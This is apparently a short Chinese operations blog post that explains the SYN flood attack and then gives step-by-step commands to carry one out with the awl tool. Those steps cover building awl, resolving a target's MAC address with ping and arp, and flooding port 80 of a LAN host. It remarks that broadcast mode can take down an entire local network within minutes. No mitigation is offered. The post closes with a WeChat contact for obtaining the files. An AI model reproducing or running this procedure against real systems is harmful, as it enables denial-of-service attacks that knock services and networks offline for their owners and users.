-
SYN洪水攻击的过程:
在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如 果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的ACK 包。
这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超关 闭,才能释放内存。
如果恶意者通过ip欺骗,发送大量SYN包给受害者系统,导致服务端存在大量未 解决连接并占用大量内存和tcp连接,从而导致正常客户端无法访问服务端, 这就是SYN洪水攻击的过程。
-
安装awl
tar zxvf awl-0.2.tar.gz cd awl-0.2 ./configure make && make install
awl参数如下:
-i 发送包的接口,如果省略默认是ens33
-m 指定目标mac地址 注:如果-m没有指定mac,默认目标MAC地址是“FF.FF.FF.FF.FF.FF”,这表示 向同一网段内的所有主机,进行SYN攻击,1-2分钟内,还容易使整个局域网 瘫痪。
-d 被攻击机器的IP
-p 被攻击机器的端口 -
开始攻击:
获取对方的IP地址解析成MAC地址
ping 192.168.1.64
arp -n Address HWtype HWaddress Flags Mask Iface 192.168.1.17 ether e0:b9:a5:ac:c5:76 C eth0 192.168.1.64 ether 00:0c:29:48:80:95 C ens33
awl -i ens33 -m 00:0c:29:48:80:95 -d 192.168.1.64 -p 80
喜欢的亲可以关注点赞评论哦!以后每天都会更新的哦!本文为小编原创文章; 文章中用到的文件、安装包等可以加小编联系方式获得;
欢迎来交流小编联系方式VX:CXKLittleBrother 进入运维交流群